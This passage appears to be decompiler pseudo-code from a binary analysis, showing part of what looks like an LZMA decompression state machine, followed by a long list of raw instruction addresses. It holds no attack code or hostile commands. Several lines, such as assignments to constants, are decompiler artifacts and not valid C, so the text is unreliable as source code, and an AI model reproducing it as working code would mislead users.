                                                                    							__eflags = _v68;
                                                                    							if(_v68 != 0) {
                                                                    								goto L92;
                                                                    							}
                                                                    							__eflags = _v100;
                                                                    							if(_v100 == 0) {
                                                                    								goto L174;
                                                                    							}
                                                                    							__eax = 0;
                                                                    							__eflags = _v60 - 7;
                                                                    							_t264 = _v60 - 7 >= 0;
                                                                    							__eflags = _t264;
                                                                    							0 | _t264 = _t264 + _t264 + 9;
                                                                    							_v60 = _t264 + _t264 + 9;
                                                                    							goto L78;
                                                                    						case 0xa:
                                                                    							__eflags = _v68;
                                                                    							if(_v68 != 0) {
                                                                    								__eax = _v8;
                                                                    								__ecx = _v60;
                                                                    								_v136 = 0xb;
                                                                    								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                    								goto L135;
                                                                    							}
                                                                    							__eax = _v44;
                                                                    							goto L91;
                                                                    						case 0xb:
                                                                    							__eflags = _v68;
                                                                    							if(_v68 != 0) {
                                                                    								__ecx = _v40;
                                                                    								__eax = _v36;
                                                                    								_v36 = _v40;
                                                                    							} else {
                                                                    								__eax = _v40;
                                                                    							}
                                                                    							__ecx = _v44;
                                                                    							_v40 = _v44;
                                                                    							L91:
                                                                    							__ecx = _v48;
                                                                    							_v48 = __eax;
                                                                    							_v44 = _v48;
                                                                    							L92:
                                                                    							__eax = _v8;
                                                                    							_v132 = 0x15;
                                                                    							__eax = _v8 + 0xa68;
                                                                    							_v92 = _v8 + 0xa68;
                                                                    							goto L71;
                                                                    						case 0xc:
                                                                    							L102:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 0xc;
                                                                    								goto L173;
                                                                    							}
                                                                    							__ecx = _v116;
                                                                    							__eax = _v16;
                                                                    							_v20 = _v20 << 8;
                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                    							_v112 = _v112 - 1;
                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							_t340 =  &_v116;
                                                                    							 *_t340 = _v116 + 1;
                                                                    							__eflags =  *_t340;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							__eax = _v48;
                                                                    							goto L104;
                                                                    						case 0xd:
                                                                    							L39:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 0xd;
                                                                    								goto L173;
                                                                    							}
                                                                    							__ecx = _v116;
                                                                    							__eax = _v16;
                                                                    							_v20 = _v20 << 8;
                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                    							_v112 = _v112 - 1;
                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							_t127 =  &_v116;
                                                                    							 *_t127 = _v116 + 1;
                                                                    							__eflags =  *_t127;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							L41:
                                                                    							__eax = _v68;
                                                                    							__eflags = _v76 - _v68;
                                                                    							if(_v76 != _v68) {
                                                                    								goto L50;
                                                                    							}
                                                                    							__eflags = __ebx - 0x100;
                                                                    							if(__ebx >= 0x100) {
                                                                    								goto L56;
                                                                    							}
                                                                    							L43:
                                                                    							__eax = _v95 & 0x000000ff;
                                                                    							_v95 = _v95 << 1;
                                                                    							__ecx = _v92;
                                                                    							__eax = (_v95 & 0x000000ff) >> 7;
                                                                    							_v76 = __eax;
                                                                    							__eax = __eax + 1;
                                                                    							__eax = __eax << 8;
                                                                    							__eax = __eax + __ebx;
                                                                    							__esi = _v92 + __eax * 2;
                                                                    							_v20 = _v20 >> 0xb;
                                                                    							__ax =  *__esi;
                                                                    							_v88 = __esi;
                                                                    							__edx = __ax & 0x0000ffff;
                                                                    							__ecx = (_v20 >> 0xb) * __edx;
                                                                    							__eflags = _v16 - __ecx;
                                                                    							if(_v16 >= __ecx) {
                                                                    								_v20 = _v20 - __ecx;
                                                                    								_v16 = _v16 - __ecx;
                                                                    								__cx = __ax;
                                                                    								_v68 = 1;
                                                                    								__cx = __ax >> 5;
                                                                    								__eflags = __eax;
                                                                    								__ebx = __ebx + __ebx + 1;
                                                                    								 *__esi = __ax;
                                                                    							} else {
                                                                    								_v68 = _v68 & 0x00000000;
                                                                    								_v20 = __ecx;
                                                                    								0x800 = 0x800 - __edx;
                                                                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							__eflags = _v20 - 0x1000000;
                                                                    							_v72 = __ebx;
                                                                    							if(_v20 >= 0x1000000) {
                                                                    								goto L41;
                                                                    							} else {
                                                                    								goto L39;
                                                                    							}
                                                                    						case 0xe:
                                                                    							L48:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 0xe;
                                                                    								goto L173;
                                                                    							}
                                                                    							__ecx = _v116;
                                                                    							__eax = _v16;
                                                                    							_v20 = _v20 << 8;
                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                    							_v112 = _v112 - 1;
                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							_t161 =  &_v116;
                                                                    							 *_t161 = _v116 + 1;
                                                                    							__eflags =  *_t161;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							while(1) {
                                                                    								L50:
                                                                    								__eflags = __ebx - 0x100;
                                                                    								if(__ebx >= 0x100) {
                                                                    									break;
                                                                    								}
                                                                    								__eax = _v92;
                                                                    								__edx = __ebx + __ebx;
                                                                    								__ecx = _v20;
                                                                    								__esi = __edx + __eax;
                                                                    								__ecx = _v20 >> 0xb;
                                                                    								__ax =  *__esi;
                                                                    								_v88 = __esi;
                                                                    								__edi = __ax & 0x0000ffff;
                                                                    								__ecx = (_v20 >> 0xb) * __edi;
                                                                    								__eflags = _v16 - __ecx;
                                                                    								if(_v16 >= __ecx) {
                                                                    									_v20 = _v20 - __ecx;
                                                                    									_v16 = _v16 - __ecx;
                                                                    									__cx = __ax;
                                                                    									_t175 = __edx + 1; // 0x1
                                                                    									__ebx = _t175;
                                                                    									__cx = __ax >> 5;
                                                                    									__eflags = __eax;
                                                                    									 *__esi = __ax;
                                                                    								} else {
                                                                    									_v20 = __ecx;
                                                                    									0x800 = 0x800 - __edi;
                                                                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    									__ebx = __ebx + __ebx;
                                                                    									 *__esi = __cx;
                                                                    								}
                                                                    								__eflags = _v20 - 0x1000000;
                                                                    								_v72 = __ebx;
                                                                    								if(_v20 >= 0x1000000) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L48;
                                                                    								}
                                                                    							}
                                                                    							L56:
                                                                    							_t178 =  &_v56;
                                                                    							 *_t178 = _v56 & 0x00000000;
                                                                    							__eflags =  *_t178;
                                                                    							goto L57;
                                                                    						case 0xf:
                                                                    							L60:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 0xf;
                                                                    								goto L173;
                                                                    							}
                                                                    							__ecx = _v116;
                                                                    							__eax = _v16;
                                                                    							_v20 = _v20 << 8;
                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                    							_v112 = _v112 - 1;
                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							_t208 =  &_v116;
                                                                    							 *_t208 = _v116 + 1;
                                                                    							__eflags =  *_t208;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							L62:
                                                                    							__eflags = __ebx - 0x100;
                                                                    							if(__ebx >= 0x100) {
                                                                    								L57:
                                                                    								__al = _v72;
                                                                    								_v96 = _v72;
                                                                    								goto L58;
                                                                    							}
                                                                    							L63:
                                                                    							__eax = _v92;
                                                                    							__edx = __ebx + __ebx;
                                                                    							__ecx = _v20;
                                                                    							__esi = __edx + __eax;
                                                                    							__ecx = _v20 >> 0xb;
                                                                    							__ax =  *__esi;
                                                                    							_v88 = __esi;
                                                                    							__edi = __ax & 0x0000ffff;
                                                                    							__ecx = (_v20 >> 0xb) * __edi;
                                                                    							__eflags = _v16 - __ecx;
                                                                    							if(_v16 >= __ecx) {
                                                                    								_v20 = _v20 - __ecx;
                                                                    								_v16 = _v16 - __ecx;
                                                                    								__cx = __ax;
                                                                    								_t222 = __edx + 1; // 0x1
                                                                    								__ebx = _t222;
                                                                    								__cx = __ax >> 5;
                                                                    								__eflags = __eax;
                                                                    								 *__esi = __ax;
                                                                    							} else {
                                                                    								_v20 = __ecx;
                                                                    								0x800 = 0x800 - __edi;
                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							__eflags = _v20 - 0x1000000;
                                                                    							_v72 = __ebx;
                                                                    							if(_v20 >= 0x1000000) {
                                                                    								goto L62;
                                                                    							} else {
                                                                    								goto L60;
                                                                    							}
                                                                    						case 0x10:
                                                                    							L112:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 0x10;
                                                                    								goto L173;
                                                                    							}
                                                                    							__ecx = _v116;
                                                                    							__eax = _v16;
                                                                    							_v20 = _v20 << 8;
                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                    							_v112 = _v112 - 1;
                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							_t371 =  &_v116;
                                                                    							 *_t371 = _v116 + 1;
                                                                    							__eflags =  *_t371;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							goto L114;
                                                                    						case 0x11:
                                                                    							L71:
                                                                    							__esi = _v92;
                                                                    							_v136 = 0x12;
                                                                    							goto L135;
                                                                    						case 0x12:
                                                                    							__eflags = _v68;
                                                                    							if(_v68 != 0) {
                                                                    								__eax = _v92;
                                                                    								_v136 = 0x13;
                                                                    								__esi = _v92 + 2;
                                                                    								L135:
                                                                    								_v88 = _t626;
                                                                    								goto L136;
                                                                    							}
                                                                    							__eax = _v80;
                                                                    							_v52 = _v52 & 0x00000000;
                                                                    							__ecx = _v92;
                                                                    							__eax = _v80 << 4;
                                                                    							__eflags = __eax;
                                                                    							__eax = _v92 + __eax + 4;
                                                                    							goto L133;
                                                                    						case 0x13:
                                                                    							__eflags = _v68;
                                                                    							if(_v68 != 0) {
                                                                    								_t475 =  &_v92;
                                                                    								 *_t475 = _v92 + 0x204;
                                                                    								__eflags =  *_t475;
                                                                    								_v52 = 0x10;
                                                                    								_v68 = 8;
                                                                    								L147:
                                                                    								_v128 = 0x14;
                                                                    								goto L148;
                                                                    							}
                                                                    							__eax = _v80;
                                                                    							__ecx = _v92;
                                                                    							__eax = _v80 << 4;
                                                                    							_v52 = 8;
                                                                    							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                    							L133:
                                                                    							_v92 = __eax;
                                                                    							_v68 = 3;
                                                                    							goto L147;
                                                                    						case 0x14:
                                                                    							_v52 = _v52 + __ebx;
                                                                    							__eax = _v132;
                                                                    							goto L143;
                                                                    						case 0x15:
                                                                    							__eax = 0;
                                                                    							__eflags = _v60 - 7;
                                                                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    							__al = __al & 0x000000fd;
                                                                    							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                    							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                    							goto L123;
                                                                    						case 0x16:
                                                                    							__eax = _v52;
                                                                    							__eflags = __eax - 4;
                                                                    							if(__eax >= 4) {
                                                                    								_push(3);
                                                                    								_pop(__eax);
                                                                    							}
                                                                    							__ecx = _v8;
                                                                    							_v68 = 6;
                                                                    							__eax = __eax << 7;
                                                                    							_v128 = 0x19;
                                                                    							_v92 = __eax;
                                                                    							goto L148;
                                                                    						case 0x17:
                                                                    							L148:
                                                                    							__eax = _v68;
                                                                    							_v84 = 1;
                                                                    							_v76 = _v68;
                                                                    							goto L152;
                                                                    						case 0x18:
                                                                    							L149:
                                                                    							__eflags = _v112;
                                                                    							if(_v112 == 0) {
                                                                    								_v140 = 0x18;
                                                                    								goto L173;
                                                                    							}
                                                                    							__ecx = _v116;
                                                                    							__eax = _v16;
                                                                    							_v20 = _v20 << 8;
                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                    							_v112 = _v112 - 1;
                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							_t490 =  &_v116;
                                                                    							 *_t490 = _v116 + 1;
                                                                    							__eflags =  *_t490;
                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                    							L151:
                                                                    							_t493 =  &_v76;
                                                                    							 *_t493 = _v76 - 1;
                                                                    							__eflags =  *_t493;
                                                                    							L152:
                                                                    							__eflags = _v76;
                                                                    							if(_v76 <= 0) {
                                                                    								__ecx = _v68;
                                                                    								__ebx = _v84;
                                                                    								0 = 1;
                                                                    								__eax = 1 << __cl;
                                                                    								__ebx = _v84 - (1 << __cl);
                                                                    								__eax = _v128;
                                                                    								_v72 = __ebx;
                                                                    								L143:
                                                                    								_v140 = _t561;
                                                                    								goto L3;
                                                                    							}
                                                                    							__eax = _v84;
                                                                    							_v20 = _v20 >> 0xb;
                                                                    							__edx = _v84 + _v84;
                                                                    							__eax = _v92;
                                                                    							__esi = __edx + __eax;
                                                                    							_v88 = __esi;
                                                                    							__ax =  *__esi;
                                                                    							__edi = __ax & 0x0000ffff;
                                                                    							__ecx = (_v20 >> 0xb) * __edi;
                                                                    							__eflags = _v16 - __ecx;
                                                                    							if(_v16 >= __ecx) {
                                                                    								_v20 = _v20 - __ecx;
                                                                    								_v16 = _v16 - __ecx;
                                                                    								__cx = __ax;
                                                                    								__cx = __ax >> 5;
                                                                    								__eax = __eax - __ecx;
                                                                    								__edx = __edx + 1;
                                                                    								__eflags = __edx;
                                                                    								 *__esi = __ax;
                                                                    								_v84 = __edx;
                                                                    							} else {
                                                                    								_v20 = __ecx;
                                                                    								0x800 = 0x800 - __edi;
                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    								_v84 = _v84 << 1;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							__eflags = _v20 - 0x1000000;
                                                                    							if(_v20 >= 0x1000000) {
                                                                    								goto L151;
                                                                    							} else {
                                                                    								goto L149;
                                                                    							}
                                                                    						case 0x19:
                                                                    							__eflags = __ebx - 4;
                                                                    							if(__ebx < 4) {
                                                                    								_v48 = __ebx;
                                                                    								L122:
                                                                    								_t399 =  &_v48;
                                                                    								 *_t399 = _v48 + 1;
                                                                    								__eflags =  *_t399;
                                                                    								L123:
                                                                    								__eax = _v48;
                                                                    								__eflags = __eax;
                                                                    								if(__eax == 0) {
                                                                    									_v52 = _v52 | 0xffffffff;
                                                                    									goto L173;
                                                                    								}
                                                                    								__eflags = __eax - _v100;
                                                                    								if(__eax > _v100) {
                                                                    									goto L174;
                                                                    								}
                                                                    								_v52 = _v52 + 2;
                                                                    								__eax = _v52;
                                                                    								_t406 =  &_v100;
                                                                    								 *_t406 = _v100 + _v52;
                                                                    								__eflags =  *_t406;
                                                                    								goto L126;
                                                                    							}
                                                                    							__ecx = __ebx;
                                                                    							__eax = __ebx;
                                                                    							__ecx = __ebx >> 1;
                                                                    							__eax = __ebx & 0x00000001;
                                                                    							__ecx = (__ebx >> 1) - 1;
                                                                    							__al = __al | 0x00000002;
                                                                    							__eax = (__ebx & 0x00000001) << __cl;
                                                                    							__eflags = __ebx - 0xe;
                                                                    							_v48 = __eax;
                                                                    							if(__ebx >= 0xe) {
                                                                    								__ebx = 0;
                                                                    								_v76 = __ecx;
                                                                    								L105:
                                                                    								__eflags = _v76;
                                                                    								if(_v76 <= 0) {
                                                                    									__eax = __eax + __ebx;
                                                                    									_v68 = 4;
                                                                    									_v48 = __eax;
                                                                    									__eax = _v8;
                                                                    									__eax = _v8 + 0x644;
                                                                    									__eflags = __eax;
                                                                    									L111:
                                                                    									__ebx = 0;
                                                                    									_v92 = __eax;
                                                                    									_v84 = 1;
                                                                    									_v72 = 0;
                                                                    									_v76 = 0;
                                                                    									L115:
                                                                    									__eax = _v68;
                                                                    									__eflags = _v76 - _v68;
                                                                    									if(_v76 >= _v68) {
                                                                    										_t397 =  &_v48;
                                                                    										 *_t397 = _v48 + __ebx;
                                                                    										__eflags =  *_t397;
                                                                    										goto L122;
                                                                    									}
                                                                    									__eax = _v84;
                                                                    									_v20 = _v20 >> 0xb;
                                                                    									__edi = _v84 + _v84;
                                                                    									__eax = _v92;
                                                                    									__esi = __edi + __eax;
                                                                    									_v88 = __esi;
                                                                    									__ax =  *__esi;
                                                                    									__ecx = __ax & 0x0000ffff;
                                                                    									__edx = (_v20 >> 0xb) * __ecx;
                                                                    									__eflags = _v16 - __edx;
                                                                    									if(_v16 >= __edx) {
                                                                    										__ecx = 0;
                                                                    										_v20 = _v20 - __edx;
                                                                    										__ecx = 1;
                                                                    										_v16 = _v16 - __edx;
                                                                    										__ebx = 1;
                                                                    										__ecx = _v76;
                                                                    										__ebx = 1 << __cl;
                                                                    										__ecx = 1 << __cl;
                                                                    										__ebx = _v72;
                                                                    										__ebx = _v72 | __ecx;
                                                                    										__cx = __ax;
                                                                    										__cx = __ax >> 5;
                                                                    										__eax = __eax - __ecx;
                                                                    										__edi = __edi + 1;
                                                                    										__eflags = __edi;
                                                                    										_v72 = __ebx;
                                                                    										 *__esi = __ax;
                                                                    										_v84 = __edi;
                                                                    									} else {
                                                                    										_v20 = __edx;
                                                                    										0x800 = 0x800 - __ecx;
                                                                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                    										_v84 = _v84 << 1;
                                                                    										 *__esi = __dx;
                                                                    									}
                                                                    									__eflags = _v20 - 0x1000000;
                                                                    									if(_v20 >= 0x1000000) {
                                                                    										L114:
                                                                    										_t374 =  &_v76;
                                                                    										 *_t374 = _v76 + 1;
                                                                    										__eflags =  *_t374;
                                                                    										goto L115;
                                                                    									} else {
                                                                    										goto L112;
                                                                    									}
                                                                    								}
                                                                    								__ecx = _v16;
                                                                    								__ebx = __ebx + __ebx;
                                                                    								_v20 = _v20 >> 1;
                                                                    								__eflags = _v16 - _v20;
                                                                    								_v72 = __ebx;
                                                                    								if(_v16 >= _v20) {
                                                                    									__ecx = _v20;
                                                                    									_v16 = _v16 - _v20;
                                                                    									__ebx = __ebx | 0x00000001;
                                                                    									__eflags = __ebx;
                                                                    									_v72 = __ebx;
                                                                    								}
                                                                    								__eflags = _v20 - 0x1000000;
                                                                    								if(_v20 >= 0x1000000) {
                                                                    									L104:
                                                                    									_t344 =  &_v76;
                                                                    									 *_t344 = _v76 - 1;
                                                                    									__eflags =  *_t344;
                                                                    									goto L105;
                                                                    								} else {
                                                                    									goto L102;
                                                                    								}
                                                                    							}
                                                                    							__edx = _v8;
                                                                    							__eax = __eax - __ebx;
                                                                    							_v68 = __ecx;
                                                                    							__eax = _v8 + 0x55e + __eax * 2;
                                                                    							goto L111;
                                                                    						case 0x1a:
                                                                    							L58:
                                                                    							__eflags = _v104;
                                                                    							if(_v104 == 0) {
                                                                    								_v140 = 0x1a;
                                                                    								goto L173;
                                                                    							}
                                                                    							__ecx = _v108;
                                                                    							__al = _v96;
                                                                    							__edx = _v12;
                                                                    							_v100 = _v100 + 1;
                                                                    							_v108 = _v108 + 1;
                                                                    							_v104 = _v104 - 1;
                                                                    							 *_v108 = __al;
                                                                    							__ecx = _v24;
                                                                    							 *(_v12 + __ecx) = __al;
                                                                    							__eax = __ecx + 1;
                                                                    							__edx = 0;
                                                                    							_t197 = __eax % _v120;
                                                                    							__eax = __eax / _v120;
                                                                    							__edx = _t197;
                                                                    							goto L82;
                                                                    						case 0x1b:
                                                                    							L78:
                                                                    							__eflags = _v104;
                                                                    							if(_v104 == 0) {
                                                                    								_v140 = 0x1b;
                                                                    								goto L173;
                                                                    							}
                                                                    							__eax = _v24;
                                                                    							__eax = _v24 - _v48;
                                                                    							__eflags = __eax - _v120;
                                                                    							if(__eax >= _v120) {
                                                                    								__eax = __eax + _v120;
                                                                    								__eflags = __eax;
                                                                    							}
                                                                    							__edx = _v12;
                                                                    							__cl =  *(__edx + __eax);
                                                                    							__eax = _v24;
                                                                    							_v96 = __cl;
                                                                    							 *(__edx + __eax) = __cl;
                                                                    							__eax = __eax + 1;
                                                                    							__edx = 0;
                                                                    							_t280 = __eax % _v120;
                                                                    							__eax = __eax / _v120;
                                                                    							__edx = _t280;
                                                                    							__eax = _v108;
                                                                    							_v100 = _v100 + 1;
                                                                    							_v108 = _v108 + 1;
                                                                    							_t289 =  &_v104;
                                                                    							 *_t289 = _v104 - 1;
                                                                    							__eflags =  *_t289;
                                                                    							 *_v108 = __cl;
                                                                    							L82:
                                                                    							_v24 = __edx;
                                                                    							goto L83;
                                                                    						case 0x1c:
                                                                    							while(1) {
                                                                    								L126:
                                                                    								__eflags = _v104;
                                                                    								if(_v104 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								__eax = _v24;
                                                                    								__eax = _v24 - _v48;
                                                                    								__eflags = __eax - _v120;
                                                                    								if(__eax >= _v120) {
                                                                    									__eax = __eax + _v120;
                                                                    									__eflags = __eax;
                                                                    								}
                                                                    								__edx = _v12;
                                                                    								__cl =  *(__edx + __eax);
                                                                    								__eax = _v24;
                                                                    								_v96 = __cl;
                                                                    								 *(__edx + __eax) = __cl;
                                                                    								__eax = __eax + 1;
                                                                    								__edx = 0;
                                                                    								_t420 = __eax % _v120;
                                                                    								__eax = __eax / _v120;
                                                                    								__edx = _t420;
                                                                    								__eax = _v108;
                                                                    								_v108 = _v108 + 1;
                                                                    								_v104 = _v104 - 1;
                                                                    								_v52 = _v52 - 1;
                                                                    								__eflags = _v52;
                                                                    								 *_v108 = __cl;
                                                                    								_v24 = _t420;
                                                                    								if(_v52 > 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									L83:
                                                                    									_v140 = 2;
                                                                    									goto L3;
                                                                    								}
                                                                    							}
                                                                    							_v140 = 0x1c;
                                                                    							L173:
                                                                    							_push(0x22);
                                                                    							_pop(_t574);
                                                                    							memcpy(_v148,  &_v140, _t574 << 2);
                                                                    							return 0;
                                                                    					}
                                                                    				}
                                                                    				L174:
                                                                    				_t538 = _t537 | 0xffffffff;
                                                                    				return _t538;
                                                                    			}










































                                                                    0x00406bc0
                                                                    0x00406bc7
                                                                    0x00406bcd
                                                                    0x00406bd3
                                                                    0x00000000
                                                                    0x00406bd7
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406bec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x00000000
                                                                    0x00406bf9
                                                                    0x00406bfd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c06
                                                                    0x00406c09
                                                                    0x00406c0c
                                                                    0x00406c0e
                                                                    0x00406c10
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c16
                                                                    0x00406c19
                                                                    0x00406c1b
                                                                    0x00406c1c
                                                                    0x00406c1f
                                                                    0x00406c21
                                                                    0x00406c22
                                                                    0x00406c24
                                                                    0x00406c27
                                                                    0x00406c2c
                                                                    0x00406c31
                                                                    0x00406c3a
                                                                    0x00406c4d
                                                                    0x00406c50
                                                                    0x00406c59
                                                                    0x00406c5c
                                                                    0x00406c84
                                                                    0x00406c84
                                                                    0x00406c86
                                                                    0x00406c94
                                                                    0x00406c94
                                                                    0x00406c98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c88
                                                                    0x00406c8b
                                                                    0x00406c8b
                                                                    0x00406c8c
                                                                    0x00406c8c
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c5e
                                                                    0x00406c62
                                                                    0x00406c67
                                                                    0x00406c67
                                                                    0x00406c70
                                                                    0x00406c76
                                                                    0x00406c78
                                                                    0x00406c7b
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c9e
                                                                    0x00406c9e
                                                                    0x00406ca2
                                                                    0x0040754e
                                                                    0x00000000
                                                                    0x0040754e
                                                                    0x00406cab
                                                                    0x00406cbb
                                                                    0x00406cbe
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc4
                                                                    0x00406cc4
                                                                    0x00406cc8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cca
                                                                    0x00406ccd
                                                                    0x00406cd0
                                                                    0x00406cfa
                                                                    0x00406d00
                                                                    0x00406d07
                                                                    0x00000000
                                                                    0x00406d07
                                                                    0x00406cd2
                                                                    0x00406cd6
                                                                    0x00406cd9
                                                                    0x00406cde
                                                                    0x00406cde
                                                                    0x00406ce9
                                                                    0x00406cef
                                                                    0x00406cf1
                                                                    0x00406cf4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d39
                                                                    0x00406d3f
                                                                    0x00406d42
                                                                    0x00406d4f
                                                                    0x00406d57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d0e
                                                                    0x00406d0e
                                                                    0x00406d12
                                                                    0x0040755d
                                                                    0x00000000
                                                                    0x0040755d
                                                                    0x00406d1e
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d2c
                                                                    0x00406d2f
                                                                    0x00406d32
                                                                    0x00406d35
                                                                    0x00406d37
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004073ce
                                                                    0x004073ce
                                                                    0x004073d4
                                                                    0x004073da
                                                                    0x004073dd
                                                                    0x004073e0
                                                                    0x004073fa
                                                                    0x004073fd
                                                                    0x00407403
                                                                    0x0040740e
                                                                    0x0040740e
                                                                    0x00407410
                                                                    0x004073e2
                                                                    0x004073e2
                                                                    0x004073f1
                                                                    0x004073f5
                                                                    0x004073f5
                                                                    0x00407413
                                                                    0x0040741a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040741c
                                                                    0x0040741c
                                                                    0x00407420
                                                                    0x004075cf
                                                                    0x00000000
                                                                    0x004075cf
                                                                    0x0040742c
                                                                    0x00407433
                                                                    0x0040743b
                                                                    0x0040743b
                                                                    0x0040743b
                                                                    0x0040743e
                                                                    0x00407441
                                                                    0x00407441
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d5f
                                                                    0x00406d61
                                                                    0x00406d64
                                                                    0x00406dd5
                                                                    0x00406dd8
                                                                    0x00406ddb
                                                                    0x00406de2
                                                                    0x00406dec
                                                                    0x00000000
                                                                    0x00406dec
                                                                    0x00406d66
                                                                    0x00406d6a
                                                                    0x00406d6d
                                                                    0x00406d6f
                                                                    0x00406d72
                                                                    0x00406d75
                                                                    0x00406d77
                                                                    0x00406d7a
                                                                    0x00406d7c
                                                                    0x00406d81
                                                                    0x00406d84
                                                                    0x00406d87
                                                                    0x00406d8b
                                                                    0x00406d92
                                                                    0x00406d95
                                                                    0x00406d9c
                                                                    0x00406da0
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406dac
                                                                    0x00406daf
                                                                    0x00406dcd
                                                                    0x00406dcf
                                                                    0x00000000
                                                                    0x00406dcf
                                                                    0x00406db1
                                                                    0x00406db4
                                                                    0x00406db7
                                                                    0x00406dba
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbf
                                                                    0x00406dc2
                                                                    0x00406dc4
                                                                    0x00406dc5
                                                                    0x00406dc8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ffe
                                                                    0x00407002
                                                                    0x00407020
                                                                    0x00407023
                                                                    0x0040702a
                                                                    0x0040702d
                                                                    0x00407030
                                                                    0x00407033
                                                                    0x00407036
                                                                    0x00407039
                                                                    0x0040703b
                                                                    0x00407042
                                                                    0x00407043
                                                                    0x00407045
                                                                    0x00407048
                                                                    0x0040704b
                                                                    0x0040704e
                                                                    0x0040704e
                                                                    0x00407053
                                                                    0x00000000
                                                                    0x00407053
                                                                    0x00407004
                                                                    0x00407007
                                                                    0x0040700a
                                                                    0x00407014
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407068
                                                                    0x0040706c
                                                                    0x0040708f
                                                                    0x00407092
                                                                    0x00407095
                                                                    0x0040709f
                                                                    0x0040706e
                                                                    0x0040706e
                                                                    0x00407071
                                                                    0x00407074
                                                                    0x00407077
                                                                    0x00407084
                                                                    0x00407087
                                                                    0x00407087
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070ab
                                                                    0x004070af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070b5
                                                                    0x004070b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070bf
                                                                    0x004070c1
                                                                    0x004070c5
                                                                    0x004070c5
                                                                    0x004070c8
                                                                    0x004070cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040711c
                                                                    0x00407120
                                                                    0x00407127
                                                                    0x0040712a
                                                                    0x0040712d
                                                                    0x00407137
                                                                    0x00000000
                                                                    0x00407137
                                                                    0x00407122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407143
                                                                    0x00407147
                                                                    0x0040714e
